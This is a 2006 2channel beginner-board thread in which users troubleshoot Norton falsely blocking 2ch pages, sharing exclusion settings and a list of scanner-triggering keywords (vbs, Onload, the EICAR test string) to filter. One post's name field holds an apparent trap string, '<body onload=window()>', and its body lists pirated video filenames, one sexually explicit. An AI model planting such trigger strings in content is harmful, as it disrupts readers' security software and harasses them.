06/07/31 00:58:59
つまらん。0点。>>637
639:ひよこ名無しさん
06/07/31 01:59:16
女王様の椅子取りゲーム
640:ひよこ名無しさん
06/08/03 17:37:02 oF+rx1Q5
>>636
ぐぐっておいてやった。参考にしる。
URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)
どれも似たような内容なので、好きなのを選べばいいべさ
641:ひよこ名無しさん
06/08/10 13:48:08
ウイルスコードの誤反応ではありませんが、
ノートンを切らないとPCQA板に入れなくなってしまいました。(進入検知が誤反応)
この場合はどうすればいいでしょうか?
642:ひよこ名無しさん
06/08/10 15:08:46
>>641
ノートンを切ればいいと思います。
643:ひよこ名無しさん
06/08/10 16:07:02
>>641
2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
URLリンク(mickey.mirv.net)
ノートン誤作動対策本部
URLリンク(qb5.2ch.net)
644:ひよこ名無しさん
06/08/10 18:08:02
<<642<<643d
645:ひよこ名無しさん
06/08/12 15:29:22
質問お願いします。
ノートン側のオプションから除外指定するとき、
*.dbx
*.nch
というのが除外の欄に書いてあったのですが、これは最初からそうなのでしょうか?
例えばノートン自体が攻撃されて書き換えられる可能性とかありますか?
646:ひよこ名無しさん
06/08/12 17:20:14
>>645
デフォルトでそうなってるから心配すんな
647:645
06/08/13 06:13:39
>>646
ありがとございます。
648:ひよこ名無しさん
06/08/14 01:05:42
マカフィーでもコード貼られたログファイル消されて見れないんだけどどうすればいい?
649:ひよこ名無しさん
06/08/15 01:23:16
>>648
>>17
スレリンク(sec板:28-29番)n
スレリンク(sec板:298-305番)n
650:ひよこ名無しさん
06/08/16 18:54:56
でも、ノートン自体は反応しても実際にウイルスではないんですよね?
651:ひよこ名無しさん
06/08/16 22:35:50
だからスレタイにも誤反応って書いてあるだろ
652:ひよこ名無しさん
06/08/17 02:53:34
確認しただけだろ。
頭固てえな。
653:ひよこ名無しさん
06/08/20 16:12:51
>643
この対応ってNISだけですよね。
自分ノートンアンチウイルスの方なんだが、やっぱ誤作動する。
これはどう解除すればいいんだ?
654:ひよこ名無しさん
06/08/20 21:24:08
>>653
>>643末尾に挙げられている過去ログでレス番727あたりから読んでみるといいかも
655:ひよこ名無しさん
06/08/22 03:27:14 NKrNf7Jc
URLリンク(mickey.mirv.net)を見て
>タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
をやってみたのですが左クリックをしても何も出てきません。
右クリックなら「Norton Anti Virusを開く」「Auto Protectを無効にする」
「Norton Antiオプション」の三つのメニューが出るんですが、
どうすればNorton Internet Securityを開くことができるんでしょうか。
656:ひよこ名無しさん
06/08/22 06:49:12
>>655
もしかしてNAVしかインストールしてないとか?
URLリンク(mickey.mirv.net) には説明ないけど
NAVでも誤反応する。>>654参照
657:ひよこ名無しさん
06/08/24 21:19:27
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
URLリンク(ansitu.xrea.jp)
■2ch NIS問題まとめページ
URLリンク(mickey.mirv.net)
■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
URLリンク(service1.symantec.com)
・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」などの
単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。
・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)
■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
URLリンク(info.2ch.net)
658:ひよこ名無しさん
06/08/29 22:27:40
727 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/03/26(日) 16:24:59 ID:pwaEyKGo0
>>726
参考までに・・・ただし、自己責任で
ノートンアンチウイルス2006 Ver.1
スレリンク(sec板:996番)
> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、
> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。
> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、
> 遮断解除してok。で、ok。
659:ひよこ名無しさん
06/09/01 17:54:57 O8GwKufV
てす
660:ひよこ名無しさん
06/09/01 19:19:06
と
661:ひよこ名無しさん
06/09/05 22:30:31
#include <mmlite.h>
#include <stdlib.h>
#include <tchar.h>
UINT __cdecl _ttoh(const _TCHAR *String)
{
UINT Value = 0, Digit;
_TCHAR c;
while ((c = *String++) != _EOS) {
if (c >= '0' && c <= '9') Digit = (UINT) (c - '0');
else if (c >= 'a' && c <= 'f') Digit = (UINT) (c - 'a') + 10;
else if (c >= 'A' && c <= 'F') Digit = (UINT) (c - 'A') + 10;
else break;
Value = (Value << 4) + Digit;
}
return Value;
}
662:ひよこ名無しさん
06/09/10 21:32:48
>>1
>>2chブラウザのログ保存フォルダを「除外」に設定。
これがどういうことかもうすこし詳しく説明してください。
2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
除外に認定とは、何の除外に認定すればいいのでしょうか。
これだけでは全く意味がわかりません。
663:<body onload=window()>
06/09/10 22:26:11
[ 自主制作映画 ] [ ジャッカル ] 第 0012 話 ジャッカルがあるさ ( Rev 0001 ) ( 低画質 Ver ).avi 7,177,218 07818b50961750fbaef7124384ac2e70
[ 自主制作映画 ] [ ジャッカル ] 第 0037 話 クッキング・オブ・ジャッカル II ( Rev 0004 ) ( 低画質 Ver ).avi 9,789,864 22b1bd0222641a2ca3cdeb2176170e1b
!(映画アニメ) ドラえもん のび太と雲の王国.avi 361,081,856 65f122004a3545aac6ae276a9765bb3c
## ひぐらしのなく頃に - 暇潰し編 - 其の壱 「ヒナミザワ」.avi 147,861,504 d85b4c07df470706aae626d5c8579571
##(ドラマ)恋の時間 第07話[704×396 DivX6.xxHe-3].avi 378,019,316 53f9c9cba3b31e05d934d3e2bb0b8f3d
#289 ダウンタウンのガキの使いやあらへんで 第289回 [1995.09.03] 今日我々は豚を食べる!!+トーク.avi 143,990,332 7616f03362cb813a456f5844a5bdb956
#DMS Night24.com アナルセックス サンドイッチ あや.avi 724,464,291 751e423a7fd2f543cbb3e624048051e0
664:ひよこ名無しさん
06/09/10 22:30:08
>>662
> 2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
使っている2ch専用ブラウザによって違います。
専用ブラウザを使っていない人には関係ありません。
> 除外に認定とは、何の除外に認定すればいいのでしょうか。
ウイルス対策ソフトの検知対象から除外するように設定します。
やり方はウイルス対策ソフトによって違います。
除外設定(「認定」ではなく「設定」)ができないウイルス対策ソフトもあります。
> これだけでは全く意味がわかりません。
以上の説明で全く意味がわからないなら、当面は気にする必要ありません。
実際にその現象に遭遇すれば自然とわかるようになるでしょう。
665:662
06/09/11 19:21:09
>>664
ミミ ヽヽヽヽリリノノノノ
ミ ,,、,、,、,、,、,、,、、 彡
r、r.r 、l i''" i彡
r |_,|_,|_,|| 」 /' '\ |
|_,|_,|_,|/⌒/ -・=-, 、-・=-│
|_,|_,|_人そ(^i ノ( 、_, )ヽ | ・・・で?
| ) ヽノ |. ノ !! |
| `".`´ ノ ノ ̄i |
人 入_ノ´ ヽニニノ ノ\
/ \_/\\ /|\\
/ \ ト ──イ/ ヽヽ
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5182日前に更新/258 KB
担当:undef